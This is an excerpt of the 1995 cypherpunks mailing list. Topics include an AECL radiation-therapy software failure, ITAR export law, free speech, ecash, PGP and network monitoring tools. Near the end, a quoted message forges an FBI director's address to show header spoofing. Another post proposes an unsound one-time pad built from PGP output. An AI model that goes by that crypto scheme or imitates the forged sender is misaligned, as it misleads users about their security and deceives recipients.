> realaudio. Don't know if they have any mpigs [sic] though. There's an alt
> newsgroup too.

Uhhm, thanks ... I guess ... but I wasn't _really_ looking for the CBC web site.
I was actually looking for someone to HOST a website which might showcase one particular program from the CBC, a program broadcast in Canada which highlighted how AECL (Atomic Energy of Canada, Limited) fails to practice safe computing and then when confronted, implements a calculated program of strategic misrepresentation. (i.e. they lie.)

I thought that someone who strongly felt that error-free protocols and error-free methods were important -- especially in mission critical applications like medicine, commerce, or nuclear power plants -- might possibly contact the CBC, and either voluntarily donate some bandwidth and a host site, or conversely build a site devoted to showcasing the human tragedy that can follow in the wake of shoddily designed software.

I mean, good grief, we have Atomic Energy of Canada taking a cavalier attitude towards computer code. Not only is AECL involved in nuclear medicine, in building wonderful radiological tools to help cancer patients (theoretically) live, but they BUILD nuclear reactors worldwide. The CBC broadcast documented how this international firm REACTS to reports of computer software errors. It documents how the firm reacts to reports of people dying because of sloppily written computer code.

The program is NOT (unfortunately) on the www.cbc.ca website, but should be placed on the net and made available. I'm not sure how, that was misunderstood. But your next statement helped make it clear.

> You oughta use Sameer's (or someone else's) replyable remailer when asking
> questions Alice.

I wasn't really asking for an answer, my Ottawa friend. I really wasn't looking for _another_ email in my mailbox to answer and address in my copious spare time. I was looking for some assistance. No direct reply was necessary. Someone could simply announce that they were volunteering to quarterback bringing a host website online, and dealing with all the issues that are involved with that (including liaising with the CBC.)
I'm not *quite* sure how you misread what I was hoping to achieve. If however, you were looking to convince me to post to from a remailer that allows replies ... one that might let you send me known plain text back through it ... something traceable back to me ... then I *might* really understand, and I might beg off for a bit. Bit premature, and such ... I think I'll pass on _that_ offer, especially since I really wasn't looking for a personal private reply to what I wrote. Maybe, if I requote myself, it will be a little clearer all around. (That's, strike two, btw ... to my Ottawa friend.) Here's what I wrote: > I know that it is rude to follow up one of your own posts, and I > apologize in advance for this horrible faux-pas, but hopefully, it's > excused this one time. I wrote: > > > >One example of this that should serve as a useful case study is a recent > >problem which was brought to the Canadian public's attention just this > >week, on a program called the Fifth Estate. The CBC (Canadian > >Broadcasting Corporation) detailed a software code problem in one of > >AECL's (Atomic Energy of Canada Limited's) instruments which deliver > >penetrating radiation. > > > >The software which controlled the radiation dose, would periodically > >override the oncologist's calibration and deliver a radiation dose 100 > >times what was prescribed. This software "bug" literally killed wherever > >the machine was in use. > > Does anyone on this list know if the CBC has a web site on the Net? > > I'm hoping that someone (hint, hint) who has a convenient website, one > with lots of spare bandwidth could volunteer to contact the CBC and > persuade them to copyright clear the Fifth Estate program clip which > documented some of the risks of software bugs in mission critical > applications, and allow it to be placed on the Net. I'm hoping that this > English language piece reaches a wide international audience. 
> > The Canadian Broadcasting Corporation is a Crown Corporation which has > historically received its primary funding from the Government of Canada. > Recently, it has suffered under the budgetary ax, and the push for > privatization. I'm pretty confident that the Corporation would copyright > clear the clip for MPEG distribution across the Net, if they were > approached with the concept that the clip was a demonstration of the CBC's > journalistic excellence and integrity, a piece which is demonstrative of > the critical need to continue their funding. A concrete demonstration of > the need for the CBC. And a piece which could well receive deserved > international acclaim. > > The site would help them, and would simultaneously be a site of > international public service. > > Nothing will drive home the need for quality software, quality code, and > quality security more than the vivid graphic pictures of the consequences > of sloppy code, or of the risks if certain critical systems, LANs, or > private networks are compromised, or if security and privacy (which are > flip sides of the same coin) are ignored. > > The sight of a body, that has had a hole burned straight through it from > the front through to the spine is truly chilling and drives the message > home. Nothing seems to speak as clearly as a picture ... as to what the > stakes are ... of what "bugs" in code do ... and of what a network > compromise can leave in its wake. > > A picture of consequences. > > Six people died in Canada and the United States due to the software flaw. > Even after numerous reports of the flaws, the company refused to even > acknowledge the existence of a problem, and in fact did everything within > its power to make sure doctors, radiologists and physicists were unaware. > > The attitude of trivialization can only be characterized as fantastic, and > would be unbelievable to anyone who has not viewed the piece. 
>
> It's one hell of a backgrounder which not only details problems, but looks
> at solutions -- it examines attitudes, especially management attitudes. It
> truly deserves an expanded audience. From teachers, to students, to the
> international media, to the concerned private individual, all will be
> served well if this piece gets wide attention.
>
> Takers, anyone??

Now, how on earth, (after rereading what I wrote) did my words get misunderstood?? And how on earth did someone figure that they needed to establish a bi-directional communications channel with me??

I mean it's not like I'm attacking AT&T or Netscape, I'm simply trying to coordinate a basic public service, and blow the whistle on bad code. Blow the whistle on software which people expect (rightfully) to be reliable ... software which people expect (rightfully) not to cause any human harm.

Alice de 'nonymous ...

...just another one of those...

P.S. This post is in the public domain.

C. S. U. M. O. C. L. U. N. E.

From thad at hammerhead.com Mon Nov 6 09:56:41 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Tue, 7 Nov 1995 01:56:41 +0800
Subject: lp ?
Message-ID: <199511061539.HAA04245@hammerhead.com>

Michael Shields quoted and wrote:
> Anonymous wrote:
> > > -- then through the same
> > > Vienna, Virginia (USA) site ...
>
> ...a major router at a major interconnect run by UUNET, a major provider.
> datasrv apparently contracted with UUNET for traffic. Naturally it would
> go through their network, which is centered in the US.

So, if this person was sending cryptographics codes from Switzerland to Israel, the code would have been imported to the US, then exported by UUNET. They can't do that, can they? Probably nobody would prosecute, but it might be something to threaten UUNET with if one of their Northern Virginia neighbors ever wanted something the couldn't get otherwise.
thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-2244 From tcmay at got.net Mon Nov 6 09:59:08 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 7 Nov 1995 01:59:08 +0800 Subject: So much for free speech... Message-ID: At 1:34 PM 11/6/95, s1113645 at tesla.cc.uottawa.ca wrote: >On Mon, 6 Nov 1995, Dr. Frederick B. Cohen wrote: > >> In the United States, we have the right to express whatever view we >> wish, so long as it doesn't endanger others (e.g., insight to riot, >> scream "fire" in a crowded theater when there is no fire, etc.). >> Everyone has an inherent right to question why a person seeks moments of >> anonymity or privacy. > >You're forgetting our good friends the libel laws. Another reason to go anon. >You have the right to say whatever you please, but you'll have to be able >to defend it in court if it damages someone's reputation. It can also get >you fired. (or shot if you're MLK) Sadly, the tradition of "free speech" is under assault. On many fronts. The new "civil rights" laws are just one avenue for the suppression of what was once considered free speech. Submitted for your disapproval: "13-year-old student arrested for racial slurs" (Santa Cruz Sentinel, p. 1, 3 November 1995) by Michael Green, Redding Record Searchlight "REDDING -- When a 13-year-old Redding student was arrested for allegedly making racial slurs, police and school administrators said it was necessary to maintain order and send a strong message against racism. "But some legal experts take a dimmer view of the boy's arrest, saying that calling someone names, even offensive ones, is not a crime and in fact is constitutionally protected. ... "The Redding-area boy, who is white, allegedly made racial insults toward a 12-year-old Hispanic student before being arrested last Thursday. ... 
"Police Chief Bob Blankeship said he would encourage officers to use the civil rights laws to stop racial harassment if prosecutors determine it is appropriate. ... "The boy was arrested on suspicion of violating the Hispanic student's civil rights. Penal Code section 422.6 makes it a misdemeanor to interfere with another person's rights or harm their property because of their race, gender, religion, disability or sexual orientation." ----- Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom to think bad thoughts," as Big Bro once said. If they don't get you for illegally using random numbers, they'll get you for uttering incorrect words. Back to reality. No word on whether prosecution will take place (I doubt it...this will likely be dropped, now that the message has been sent to the students, and now that civil rights folks are getting interested). Children are usually not accorded full constitutional protections, especially not in public schools, but this does not mean the police should arrest those who utter the wrong words! (Maybe suspending the student, though I certainly wouldn't do that.) This is the "safe and secure" world we are in, where bad thoughts and bad words are punished. Or threatened with lawsuits. Anarchy seems infinitely preferable to me. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." 
From hallam at w3.org Mon Nov 6 10:02:18 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 02:02:18 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <199511040030.TAA28181@opine.cs.umass.edu>
Message-ID: <9511061741.AA23439@zorch.w3.org>

>Suppose I have serious and plausibly realistic aspirations to become an
>authority in some subtopic of cryptography, network security, etc. (sometime
>well into the next millenium). Am I more likely to learn and hone my skills
>by actively participating (sticking my neck out) or merely lurking
>indefinitely ? Regardless of the answer to the previous question, should
>the list suffer me my missteps and naivete ?

This depends on what you are attempting to do. If you are attempting to not be thought a fool by anyone then keep quiet. If you want to learn something then you have to speak up.

If you have an idea then the only way to know if it is any good is to test it. In the sciences we perform experiments. In engineering and social sciences this is not necessarily possible. We can still test an idea by voicing it and looking at the response. This is the heart of Habermas's theory of communicative action (modulo it is impossible to communicate such a complex set of ideas in a single paragraph).

Just because the response to an idea is hostile does not make it invalid however, the quality of the responses matters. If you get back a reasoned argument you may judge it on the basis of the plausibility of its axioms and the correctness of its logic - accepting that the argument may be incomplete and not fully explain the point of view. If on the other hand people write "This is wrong and I've told the person why in secret" then the argument probably isn't valid. The funniest version of this type of post being the "Here is an example of what is wrong, I won't waste bandwidth here explaining the faults even though I have already done so in making the post in the first place.
So I have not only wasted bandwidth but interrupted a lot of people with a vacuous post.

To address Perry's point on social security privatisation, If there was such a proposal and the basis on which it were to be run was that the privatised company would gain all the data rights then I think there would be the very type of political debate that characterises clipper.

One thing about the "new" key escrow system that people have not picked up on. Would you trust Microsoft to be a key agent if you were Lotus or vice-versa? Why on earth should private key escrow be any better?

Phill

From hallam at w3.org Mon Nov 6 10:06:57 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 02:06:57 +0800
Subject: FBI seeks huge wiretapping system
In-Reply-To: <199511042303.PAA29063@blob.best.net>
Message-ID: <9511061746.AA11219@zorch.w3.org>

>This of course is the basic evil of government regulation: Bricks are
>dangerous. Two by fours are dangerous. Water is dangerous. Playgrounds
>are dangerous. Everything is dangerous, because everything could be used
>to cause harm, deliberately or accidentally.

You miss the central point. The NSA are simply one link in a bureaucratic chain. Their behaviour is determined by their position in that chain and the nature of the question they are asked.

If we could change the question they were asked from "is this dangerous" to "is this significantly more dangerous than allowing ownership of guns" we might get somewhere.

Phill

From gnu at toad.com Mon Nov 6 10:38:28 1995
From: gnu at toad.com (John Gilmore)
Date: Tue, 7 Nov 1995 02:38:28 +0800
Subject: New sendmail coming on toad.com; expect disruptions
Message-ID: <9511061822.AA28208@toad.com>

Hugh and I will be installing a new sendmail on toad over the next day or two. You can expect some delays and troubles from the list over that period as we shake it down. We hope that the result will be faster and better service for y'all.
John Gilmore From raph at CS.Berkeley.EDU Mon Nov 6 10:53:56 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Tue, 7 Nov 1995 02:53:56 +0800 Subject: So much for free speech... In-Reply-To: Message-ID: <199511061833.KAA27054@kiwi.cs.berkeley.edu> -----BEGIN PGP SIGNED MESSAGE----- Tim May writes: [...] > Wow! "Verbal abuse." Throw away the key. "Freedom does not mean the freedom > to think bad thoughts," as Big Bro once said. [...] Indeed. The conviction on my criminal record for verbal abuse is one of the things that opened my eyes to the true state of "free speech" in this country. Raph -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBMJ5U42RuKj5D5x2JAQH0BgF9FxkKs0cRM/Ri0yvUKTnu5Q/2QAaEFVcD rU6aruVdEN+j3iXOF0ot3mNRqoKc3nYN =03DF -----END PGP SIGNATURE----- From junger at pdj2-ra.F-REMOTE.CWRU.Edu Mon Nov 6 10:55:18 1995 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Tue, 7 Nov 1995 02:55:18 +0800 Subject: lp ? Message-ID: "Perry E. Metzger" writes: : : Thaddeus J. Beier writes: : > So, if this person was sending cryptographics codes from Switzerland : > to Israel, the code would have been imported to the US, then exported : > by UUNET. They can't do that, can they? Probably nobody would prosecute, : > but it might be something to threaten UUNET with if one of their Northern : > Virginia neighbors ever wanted something the couldn't get otherwise. : : It isn't clear that telecoms treaties don't implicitly make this legal : in spite of the export regulations. Once again, what the ITAR forbid is the disclosure of cryptographic software to a foreign person within or without the United States, so it does not make any difference whether the message containing the code passes through the United States or not. -- Peter D. 
Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From dl at hplyot.obspm.fr Mon Nov 6 11:09:20 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Tue, 7 Nov 1995 03:09:20 +0800
Subject: So much for free speech...[noise?]
In-Reply-To:
Message-ID: <9511061846.AA21160@hplyot.obspm.fr>

"Freedom shall stops where starts the one of the others"

That's what I learned, and what I think it is a "good thing",

Thus, your freedom of speech shall stops where it starts hurting people [not that I support at all the childish way l^Hamericans sue everybody for anything, but I am happy that racists saying are not allowed and can be condemned in France.]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
class struggle domestic disruption Kennedy bomb Saddam Hussein Peking Kaser Sose

From szabo at netcom.com Mon Nov 6 11:52:48 1995
From: szabo at netcom.com (Nick Szabo)
Date: Tue, 7 Nov 1995 03:52:48 +0800
Subject: Recovering lost coins in ecash
Message-ID: <199511061916.LAA19291@netcom7.netcom.com>

> One problem a number of people have reported in DigiCash is disappearing
> money. Several people have reported that if a transfer is misconfigured
> the cash can flow out of the wallet, be rejected at the other end and
> disappear from the system - i.e. misprinted names on cheques mean lost cash!

These users need to learn the features of the software. Backups of spent coins are retained in the payment history ledger. Select the payment from the ledger, and hit _Cancel_ to cancel the payment. This credits the lost coins to your account.

The story behind this (which is, alas, not so apparent to the user) is that this essentially spends the coins at the bank, so that if they were lost, the amount will be credited to your account.
If the coins were already cleared and credited to the payee then you ask the payee for your money back (or to properly deliver the purchased service), relying on their business reputation (ie, complain loud and publicly if you don't get satisfaction). For the latter case an escrow service would be a useful third-party add-on to the basic ecash system, to allow exchanges in larger amounts without incurring this risk from the payee.

This bit of electronic magic is one place where ecash is superior to physical cash -- but at the expense of not being obvious from the metaphor. It also illustrates the superior flexibility of online clearing -- double spending is used as an error recovery tool, to find out whether the payment was in fact lost, rather than as an indication of fraud.

Nick Szabo szabo at netcom.com
Internet commerce consultant

From m5 at dev.tivoli.com Mon Nov 6 12:04:38 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Tue, 7 Nov 1995 04:04:38 +0800
Subject: So much for free speech...[noise?]
In-Reply-To:
Message-ID: <9511061923.AA16190@alpha>

Laurent Demailly writes:
> Thus, your freedom of speech shall stops where it starts hurting
> people

It hurts me --- really --- to read that. You should be condemned.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From perry at piermont.com Mon Nov 6 12:10:03 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 04:10:03 +0800
Subject: lp ?
In-Reply-To:
Message-ID: <199511061924.OAA14371@jekyll.piermont.com>

"Peter D. Junger" writes:
> "Perry E. Metzger" writes:
> : It isn't clear that telecoms treaties don't implicitly make this legal
> : in spite of the export regulations.
>
> Once again, what the ITAR forbid is the disclosure of cryptographic
> software to a foreign person within or without the United States, so
> it does not make any difference whether the message containing the
> code passes through the United States or not.

I understand that you are a lawyer and I'm not, but it is my understanding that international treaties come into play on this sort of thing. For instance, in international shipments, you can transship items and substances that are illegal to possess in a country through its ports provided that the materials do not originate or terminate their shipment in the country and remain sealed in their containers throughout. It is also my understanding that items like mail and phone calls that happen to transit a country are not necessarily subject to that nation's laws provided that the nation is not a terminal point for the mail or call or what have you. Treaties on this subject would quite clearly supersede any federal laws under the supremacy clause of the constitution.

I am not absolutely sure of this, but I'm fairly sure that there are already rules on all of this.

Perry

From frantz at netcom.com Mon Nov 6 12:23:22 1995
From: frantz at netcom.com (Bill Frantz)
Date: Tue, 7 Nov 1995 04:23:22 +0800
Subject: Credentials Without Identity
Message-ID: <199511061951.LAA14798@netcom5.netcom.com>

At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>This applies very much so in Sweden too. It *is* illegal to maintain any
>database with 'information on persons' (like their email addresses) without
>approval from the Data Inspection. But it's an open secret that this law
>is broken on a massive front and no bureaucrat is really trying to uphold it.

So the address book I keep in my hip pocket is illegal!

-----------------------------------------------------------------
Bill Frantz Periwinkle -- Computer Consulting
(408)356-8506 16345 Englewood Ave.
frantz at netcom.com Los Gatos, CA 95032, USA

From aleph1 at dfw.net Mon Nov 6 12:28:01 1995
From: aleph1 at dfw.net (Aleph One)
Date: Tue, 7 Nov 1995 04:28:01 +0800
Subject: [NOISE] Re: Java insecurity - long - argumentative - you are warned.
In-Reply-To: <9511061047.AA13370@all.net>
Message-ID:

Ahh I told myself I would not reply to this but this next statement proved to me the "Dr. FC" has never read the Java Language Specification.

> > Object field accesses are known to be legal--private or public
> > or protected
>
> What exactly does this mean?

Obviously he has no idea what an object field is and what modifiers such as private or public do. Also as in your flamage of Netscape you won't find answers here. If you really wanted answers you would post to the java mailing list at Sun where their engineers would answer your questions. But it seems you don't really want answers. In any case I'm crossposting this to the java mailing list.

a1

Aleph One / aleph1 at dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

From rsalz at osf.org Tue Nov 7 04:40:41 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 7 Nov 95 04:40:41 PST
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511071238.AA00909@sulphur.osf.org>

>Sorry. But still, the intent was to be user-friendly (right?), and
>a side effect was to make it possible to renumber without anyone noticing.

No. DNS was created because the management of everyone editing and downloading one huge file was just falling apart. The Arpanet always used names instead of numbers. Moving hosts around was always possible.

CIDR doesn't affect the fact that if nntp.com switches, say, to BBN Planet then I will have to get a new address. CIDR just says you can route based on smaller/larger granularity than IP Network Address classes.

>That's the connection between DNS and routing, and it's why using names
>instead of numbers is Good.
There is no connection. Using names instead of numbers is good. It does bring up an interesting philosophical question about where the True Name really is. And how DNS must be part of your TCB unless/until you have end-to-end mutual authentication.

/r$

From warlord at MIT.EDU Mon Nov 6 12:49:50 1995
From: warlord at MIT.EDU (Derek Atkins)
Date: Tue, 7 Nov 1995 04:49:50 +0800
Subject: Wich pgp is stronger?
In-Reply-To: <222*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
Message-ID: <199511062004.PAA10278@toxicwaste.media.mit.edu>

> Which pgp is supposed to be stronger, 2.6.2 or 2.6.2 i?
>
> What are exactly the differences between them?

I'm not sure what you mean by "stronger"? I must admit that I have not taken a close look at 2.6.2i, but my understanding is that it is an internationalized version of code similar to 2.6.2. The keygen routines, RNG, and IDEA code are the same; the RSA code is different, but supports the same range of keysizes. The difference in RSA code has to do with US patent law, where PGP 2.6.2 uses RSAREF, so it is licensed to do RSA. Other than that, I doubt there is any real difference. The major crypto and security functions are the same (or should be -- as I said, I've not taken a close look at 2.6.2i).

-derek

From jolson at squeaky.free.org Tue Nov 7 04:57:54 1995
From: jolson at squeaky.free.org (jolson)
Date: Tue, 7 Nov 95 04:57:54 PST
Subject: Software development
Message-ID: <199511071301.HAA11964@squeaky.free.org>

Two suggestions for new product development

1. Secure virtual disk drives for OS/2
2. A combination of secure email server/client for public domain use such as this E-Mail list.

From hallam at w3.org Mon Nov 6 13:13:09 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 7 Nov 1995 05:13:09 +0800
Subject: Credentials Without Identity
In-Reply-To: <199511061951.LAA14798@netcom5.netcom.com>
Message-ID: <9511062041.AA15494@zorch.w3.org>

>At 13:35 11/5/95 +0100, Mats Bergstrom wrote:
>>This applies very much so in Sweden too. It *is* illegal to maintain any
>>database with 'information on persons' (like their email addresses) without
>>approval from the Data Inspection. But it's an open secret that this law
>>is broken on a massive front and no bureaucrat is really trying to uphold it.
>So the address book I keep in my hip pocket is illegal!

Not in the UK, any database maintained on a computer system is covered under the act. Manual records are not. This distinction is made because a group of senior conservative party members and supporters finance a group who keep records of "political dissidents". These are available - for a fee for use in checking employees before giving them jobs.

Personally I think that this type of behaviour is unacceptable in a democracy and that it demonstrates the arrogance of power. I also think it falls plumb center in the concerns of this group. Should such groups be allowed to buy details of our spending habits from supermarkets?

The UK law essentially means that data gathered for one purpose may not be used for another purpose without permission. It is entirely OK to have an address book of email addresses for the purpose of sending them mail.

Phill

From tcmay at got.net Mon Nov 6 13:17:01 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 05:17:01 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
Message-ID:

I usually avoid passing on URLs of interesting sites, in the name of conserving bandwidth (*), but this one really has me jazzed:

http://dejanews.com/

It allows searching of Usenet archives (a few months' worth, from what I can see).

This was pointed out to me on the Cyberia list, by Eugene Volokh, who wrote:

" Check out http://dejanews.com/ -- truly a remarkable service. They index a huge number of Internet news groups, and let you search through them for any word or words you want.

" Want to know what people are saying about some new book? About some political topic? Most importantly, about you behind your back? Check it out! Lots of fun, and a bit scary."

A good way for newcomers to find out what's been written on some topic that interests them, or to see who's writing what. (I checked out the index for: "Blacknet," "Chaum," and a bunch of other things...the possibilities are endless, and I suspect this will be the URL I go to more often than any other.)

--Tim May

(* Perhaps someday we might ask people what their favorite URLs are. We've done polls on books, so why not URLs?)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From stewarts at ix.netcom.com Mon Nov 6 13:41:42 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 7 Nov 1995 05:41:42 +0800
Subject: using PGP only for digital signatures
Message-ID: <199511062107.NAA29648@ix5.ix.netcom.com>

At 04:12 PM 11/4/95 -0500, James Black wrote:
>Hello,
> I am in a discussion (during the week) with a system administrator
>about seeing if we can just make PGP publically available to everyone,
>but now the discussion seems to be to just allow PGP to do digital
>signatures, and I don't think that is the best choice, then. They are
>not against PGP being used, but there are legal issues as to whether they
>can offer it to everyone, as some students are international students,
>and are not allowed to use the version for the US, or so I have been
>informed, so now I need to see if we can have the international version,
>so these students can use it. :(
> Is there any good programs (for the Unix, SunOS) that just does digital
>signature encryption? What they are trying to do is make certain that no
>one can send a message to anyone, claim to be in the faculty, and cause
>problems that way. My position is just a student programmer, but I am
>trying to learn as much as I can, to answer questions and deal with problems.

Yeah, there's RIPEM-SIG, which is approved for export so you can even give it to your non-Yankee students, and it's compatible with the RIPEM secure email stuff. So your US students, and anyone else who wants to download the software from England, can send secure email, and everybody can check the signatures. I'm not sure if RIPEM-SIG has caught up with the features in the latest versions of RIPEM, which include an X.509 variant on Web of Trust.

Somebody else has brought up the insecurity of using security software on multi-user machines, where the system administrator or anybody who cracks root can steal your passphrases and even replace the trustable software with trojan-horse versions; your students will be safer if they only trust stuff running on PCs from software they've verified themselves. But you can at least do signature-checking safely on a multi-user machine if the software is protected adequately.
#---
# Thanks; Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From gimonca at mirage.skypoint.com Mon Nov 6 14:17:32 1995
From: gimonca at mirage.skypoint.com (Charles Gimon)
Date: Tue, 7 Nov 1995 06:17:32 +0800
Subject: DejaNews all over again--a URL for Usenet Searching (fwd)
Message-ID:

Forwarded message:
>
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
>
> http://dejanews.com/
>
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).
>
>
> " Want to know what people are saying about some new book? About
> some political topic? Most importantly, about you behind your back?
> Check it out! Lots of fun, and a bit scary."
>

Or to paraphrase Huey Long, "Every Man a Kibo".

From cme at acm.org Mon Nov 6 15:27:35 1995
From: cme at acm.org (cme at acm.org)
Date: Tue, 7 Nov 1995 07:27:35 +0800
Subject: GAK criteria
Message-ID: <9511062204.AA02788@tis.com>

http://csrc.ncsl.nist.gov/keyescrow/

From shields at tembel.org Mon Nov 6 16:28:10 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 08:28:10 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To:
Message-ID: <47m326$349@yage.tembel.org>

In article , Timothy C. May wrote:
> I usually avoid passing on URLs of interesting sites, in the name of
> conserving bandwidth (*), but this one really has me jazzed:
>
> http://dejanews.com/

Equally interesting is the author profile feature. They don't provide a perfectly convenient way to access it, so use this form.

DejaNews author profile quickskip

DejaNews is here

-- Shields.

From whitaker at sover.net Mon Nov 6 19:02:27 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Tue, 7 Nov 1995 11:02:27 +0800
Subject: toolkits?
Message-ID: <199511070141.UAA15583@maple.sover.net>

OK folks, nobody seems to have any ideas how to keep our little state of Vermont from falling prey to mediocrity in the internet. I thought with so many highly opinionated people I would at least get a few good or at least entertaining suggestions.

How about a different angle. Can anyone aid in building capacity among a few sincere watchdog types to really learn how to map, trace and test the net here as it grows? What constitutes a basic toolkit for trace route, sniff for promiscuous mode, all the other tools to map what's happening to net traffic in a little state of 1/2 million people? What are the sources of traffic information?

With there not even a single DS-3 in the state yet carrying IP it seems we just might have a prayer of doing it right, whatever that is. What would it look like if secure communications and anonymity were designed in from the start? Is this what Sameer is doing in Bezerkeley?

What machines are considered minimum requirements to use these tools? What are the essential reference works?

-sw

From Alan.Pugh at internetMCI.COM Mon Nov 6 19:03:53 1995
From: Alan.Pugh at internetMCI.COM (amp)
Date: Tue, 7 Nov 1995 11:03:53 +0800
Subject: using pgp to make an otp
Message-ID: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>

-- [ From: amp * EMC.Ver #2.3 ] --

> While in theory the output of PGP would be ``random'' enough for a
> one-time pad, you need to take into account that there is ``header''
> information in a PGP message. This info in the first several bytes
> indicates which key was used, how big the message is, whether the
> receiving PGP should save the decrypted file, etc. This part is not
> very random at all.

i understand the non-random portions of the pgp output, which is why i specified in my original message that the 1st 20 or so lines would find their way to the bit bucket.

> The weakness in this method is that the ``key'' to the OTP is composed
> of the PGP encryption key and the plaintext used to generate the
> pad. Both would have to be fairly well protected to prevent a bad
> guy from either a) generating his own copy of the OTP by obtaining
> the key and plaintext or b) forcing you to use a known OTP by munging
> your copy of the key or plaintext.

i'm confused here. how would the 'key' to the otp be related to my pgp encryption key? if i strip off all the identifying information that pgp uses to recognise how to decrypt a message, and destroy the 'clean' copy of the file(s) that eventually became part of my otp, how could the resulting output be tied to my key? if it could, then pgp is less secure than i give it credit for being.

if your objection is based on the fact that my public key is a known entity, this can easily be bypassed by creating a brand new key from a freshly unzipped copy of pgp. use that key to create the otp, then destroying the key(s) used to create it.

> This technique does have its uses. For instance, if you use DES you
> can ``seed'' it with a value, then by re-encrypting the output of DES
> repeatedly you can generate an essentially random sequence of
> values. This can be used as a OTP for a stream cypher.

isn't this essentially what i'm doing? if it is necessary, i can do this...(assuming a virgin key)

1. create a cyphertext of a file.
2. strip the identifying lines.
3. create a new cyphertext from the resulting file.
4. repeat until paranoia level < comfort zone.

my point here is that _if_ pgp output is random enough, i wouldn't need hardware. even i, with my extremely limited programming skills could create a .cmd file or program that could be used as input for a stream cypher. imo, for crypto to be useful, it has to be easy.
i'm trying to find a way to do this that can be implemented anywhere.

From tien at well.sf.ca.us Mon Nov 6 19:31:00 1995
From: tien at well.sf.ca.us (Lee Tien)
Date: Tue, 7 Nov 1995 11:31:00 +0800
Subject: forging headers
Message-ID: <199511070249.SAA14921@well.com>

So I got this message. How would someone identify the sender of this message? I'm writing an article on anonymity, with some discussion of remailers, and want to argue that forging already permits people to raise the costs of tracing significantly, anonymous remailers or no.

Lee

>From: freeh at fbi.gov
>Date: Tue, 24 Oct 95 16:07:08 -0400
>Apparently-To: tien at well.sf.ca.us
>X-UIDL: 814570964.056
>
>> How difficult is it to forge headers? How difficult is it to trace a
>> message to the actual sender if the header is forged?
>
>Not very difficult at all (to forge, that is). This is a quick and dirty
>example that should be somewhat traceable. If you want pointers on how to
>trace it, post the whole thing, including headers, to cypherpunks.
>
>Louis
>
>

From perry at piermont.com Mon Nov 6 19:48:25 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 7 Nov 1995 11:48:25 +0800
Subject: forging headers
In-Reply-To: <199511070249.SAA14921@well.com>
Message-ID: <199511070255.VAA14851@jekyll.piermont.com>

You didn't send ALL the headers, only some of them. You need to send on the full set to make a trace possible.

Lee Tien writes:
> So I got this message. How would someone identify the sender of this
> message? I'm writing an article on anonymity, with some discussion of
> remailers, and want to argue that forging already permits people to raise
> the costs of tracing significantly, anonymous remailers or no.
>
> Lee
>
> >From: freeh at fbi.gov
> >Date: Tue, 24 Oct 95 16:07:08 -0400
> >Apparently-To: tien at well.sf.ca.us
> >X-UIDL: 814570964.056
> >
> >> How difficult is it to forge headers? How difficult is it to trace a
> >> message to the actual sender if the header is forged?
> >
> >Not very difficult at all (to forge, that is). This is a quick and dirty
> >example that should be somewhat traceable. If you want pointers on how to
